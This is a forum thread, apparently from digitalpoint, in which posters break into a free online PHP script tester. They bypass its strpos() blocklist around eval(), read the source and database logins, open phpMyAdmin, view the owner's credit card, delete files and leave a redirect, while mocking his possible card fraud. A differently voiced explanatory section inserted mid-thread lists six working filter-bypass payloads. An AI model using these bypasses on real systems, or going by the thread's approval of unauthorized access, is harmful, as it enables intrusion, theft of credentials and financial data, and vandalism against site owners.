Hi, everyone. I recommend you check this website out: http://forumferney.free.fr/stester.html. It's a dynamic website on which you can directly execute PHP scripts to test them (without uploading), and for free. You can even use the script on your own website! (By looking at the source code you can call the PHP script from your website directly.)
I just deleted stester.html. Good job on security. EDIT: After highlighting the code of your execute script, I figured it was even easier to bypass the security hole than I thought. Oh jeez... EDIT 2: I just found your MySQL access details for mysql5.worldispnetwork.com. This is exciting. Thanks for putting this up. EDIT 3: Also found your MySQL details for the host you're using for this. You're too smart. EDIT 4: Wow, I just entered your phpMyAdmin and found your credit card number, lmao. It expires on 05/08. Dude, seriously. Take this shit off. EDIT 5: I deleted stexecute.php as well now. Just for your own good. You should be thankful...
It's funny what ideas people have. What on earth would this be good for? I guess every serious coder has a local web server with PHP and tests the code there.
Awesome... Well, maybe you can tell a thing or two about what he did wrong, as I too may be doing something that stupid.
I think by using highlight_file(__FILE__); you can see the source code of a web page. Then you can see the database connection file, then access phpMyAdmin?
EDIT: Well, he has a separate server for MySQL, with another subdomain. I just went there and it asked me for the login details, which were in the highlighted file as well. He had about 500 "or"s in his code, which looked more or less like this:

if (strpos($code, 'fopen(') !== false || strpos($code, 'opendir(') !== false || strpos($code, 'readdir(') !== false [.......])

I expected the code to be a little bit more secure and did this to bypass the function block:

$echo = 'opendir';
$echo2 = 'readdir';
$fp = $echo('.');
while (($file = $echo2($fp)) !== false) {
    echo "$file<br />\n";
}

From there I could see the files. glob() didn't work for some reason. Or, now that I think of it, maybe print_r() doesn't work with eval()... anyway. Now that I could read the dirs, I just did a highlight_file() on the files that seemed interesting and saw their contents. I could have bypassed this even more easily by putting a space between the function name and the bracket:

$dir = opendir ('.');

But I figured that out later, after highlighting the execute file.
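The post above describes a substring blocklist (strpos() on "fopen(", "opendir(", ...) guarding an eval() of user-submitted PHP, and two ways past it. The following is an added example, not the ScriptTester author's code: it reconstructs that style of filter and runs a set of constructed payloads through it to show which the filter actually catches. The names $blocked, is_allowed(), run_untrusted() and the RUN_PAYLOADS switch are assumptions made for this illustration; it runs on PHP 7 or later.

```php
<?php
// Added example (not code from the original page). A blocklist in the style
// the thread describes: exact substring matches against the submitted source.
$blocked = [
    'fopen(', 'opendir(', 'readdir(', 'scandir(',
    'highlight_file(', 'file_get_contents(', 'show_source(',
];

// Returns true when none of the blocked substrings occur in $code.
function is_allowed(string $code, array $blocked): bool
{
    foreach ($blocked as $needle) {
        if (strpos($code, $needle) !== false) {
            return false;          // literal "name(" found: rejected
        }
    }
    return true;
}

// Constructed payloads. Every one lists the current directory or dumps this
// file; only the first contains a blocked substring as written.
$payloads = [
    // 1. literal call: the only form the filter can see
    'literal'      => '$d = opendir("."); while (($f = readdir($d)) !== false) echo $f, "\n";',
    // 2. whitespace before the parenthesis: "opendir(" is no longer a substring
    'space'        => '$d = opendir ("."); while (($f = readdir ($d)) !== false) echo $f, "\n";',
    // 3. variable function name: the name is a string, not a token in the source
    'variable'     => '$o = "opendir"; $r = "readdir"; $d = $o("."); while (($f = $r($d)) !== false) echo $f, "\n";',
    // 4. name assembled at runtime: never appears contiguously anywhere
    'concatenated' => '$o = "open" . "dir"; $r = "read" . "dir"; $d = $o("."); while (($f = $r($d)) !== false) echo $f, "\n";',
    // 5. a built-in the list author simply did not think of
    'glob'         => 'foreach (glob("*") as $f) echo $f, "\n";',
    // 6. the highlight_file(__FILE__) trick from the thread, with the space variant
    'highlight'    => 'highlight_file (__FILE__);',
];

// Executes one payload the way the tester page did. Opt-in only: set
// RUN_PAYLOADS=1 in the environment, and do it in a throwaway directory.
function run_untrusted(string $code): void
{
    if (getenv('RUN_PAYLOADS') !== '1') {
        return;
    }
    eval($code);
}

foreach ($payloads as $name => $code) {
    $ok = is_allowed($code, $blocked);
    printf("%-13s %s\n", $name, $ok ? 'ALLOWED (filter bypassed)' : 'blocked');
    if ($ok) {
        run_untrusted($code);
    }
}
```

Run without RUN_PAYLOADS set, the script only reports the filter's verdict: "literal" is blocked and the other five are allowed. The point for a practitioner is that the second through sixth cases are not exotic; whitespace, variable functions and string concatenation are ordinary PHP, so any eval() of attacker-controlled source defeats a substring filter by construction. The defensible design is not a longer list but isolation: execute submitted code in a disposable environment that holds no credentials, no database access and no copy of the site's own files, so that reading the directory (as the thread's poster did) yields nothing worth finding.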
Lol, I'm sorry. You still can with a local form. Point it to stexecute.php with a field named "code".
Lol, he's stupid enough to put it up again after it "magically" disappeared. I hope he learns now. And if not, I'll continue messing it up until he gets it, lol.
You know, I don't even need a local form to mess with it, loool. Just use Google cache and it will work... xxx Cxxx doxx mexx scriptxxxx.html uxxxx.php maxxx.html jsxxxx
He disabled highlight_file(); lol. Error: Some commands in this script are not allowed in ScriptTester. Click here for a list of unallowed commands.
See my post above to see how to bypass this. http://forums.digitalpoint.com/showpost.php?p=2963065&postcount=8
I think he's a French guy; a lot of the Flash and files are in French. I think we should leave him a French message as well, lol.
Left him a French message, loool, and a redirection to this thread after 10 seconds, so we can be sure he reads it.
Hahahahah... come on, people... he was just making some new friends (visitors). Stop being so mean... so what if he might lose his CC to fraud?!?! :)) Hahah... this shit was strong...